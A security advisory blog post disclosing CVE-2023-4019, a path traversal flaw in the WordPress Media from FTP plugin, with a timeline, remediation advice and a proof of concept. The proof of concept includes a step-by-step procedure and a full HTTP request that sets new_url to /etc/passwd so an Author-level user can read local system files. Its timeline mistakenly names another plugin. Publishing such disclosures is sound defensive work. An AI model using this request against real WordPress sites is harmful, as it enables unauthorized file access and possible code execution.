In a profound exploration of WordPress plugins, a chilling revelation has come to light. During meticulous testing, a high-impact vulnerability was unearthed within the Media from FTP plugin, specifically versions preceding 11.17. This alarming flaw exposes an avenue for attackers to exploit Path Traversal techniques, enabling unauthorized access to sensitive files and documents. The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.
Main info:
| CVE | CVE-2023-4019 |
| Plugin | Media from FTP |
| Critical | High |
| Publicly Published | August 14, 2023 |
| Last Updated | August 14, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A5: Broken Access Control |
| PoC | Yes |
| Exploit | Will be later |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019 https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d |
| Plugin Security Certification by CleanTalk |  |
Timeline
| July 26, 2023 | Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed |
| July 26, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| July 31, 2023 | The author has released a fix update |
| August 14, 2023 | Registered CVE-2023-4019 |
Discovery of the Vulnerability
During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action, which allows downloading local folders outside of /var/www/html, which gives attackers a huge potential. They can download any local files in the media and then view them for example /etc/passwd, /etc/hosts and other local files/documents. This is possible on behalf of a user with Author rights. By default, the Author is not authorized to view local files and it cannot interact with them directly, viewing local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and if it does not contain a root directory, then do forbidden
Understanding of Path Traversal attack’s
Path Traversal, a notorious hacking technique, is at the core of this vulnerability. It involves manipulating file paths to breach directory boundaries and access files beyond the intended scope. Malicious actors exploit this to access files and directories that are otherwise restricted. Path Traversal OWASP TOP-10
Exploiting the Path Traversal vulnerability
Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.
POC:
1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register
2) Select any file from the media text list below
3) Click “Update Media”
4) Intercept request with action=mediafromftp-update-ajax-action
5) Сhange new_url to local dir like /etc/passwd or /etc/hosts
POC request:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_host
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: http://your_host
DNT: 1
Connection: close
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36
Potential Risks and Real-World Impact
The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:
- Data Exposure:
Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity. - Malicious Use of Stolen Data:
Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system. - System Disruption:
Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.
Recommendations for Improved Security
Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:
- Immediate Plugin Update:
Upgrade the Media from FTP plugin to version 11.17 or above. This update addresses the Path Traversal vulnerability and enhances security. - Input Validation:
Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories. - Regular Security Audits:
Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively. - Path Validation:
Implement robust path validation mechanisms to ensure that user-entered paths remain within the authorized directory scope.
Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.
#WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected
Use CleanTalk solutions to improve the security of your website
Dmitrii i.
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
Related posts
CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal
CVE-2023-3664 – FileOrganizer <= 1.0.2 - Admin+ Arbitrary File Access
CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)
CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF
CVE-2023-4238 – Prevent files / folders access < 2.5.2 - Remote Code Execution
CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF
CVE-2023-4307 – Lock User Account <= 1.0.3 - Arbitrary Lock/Unlock All Account's via CSRF
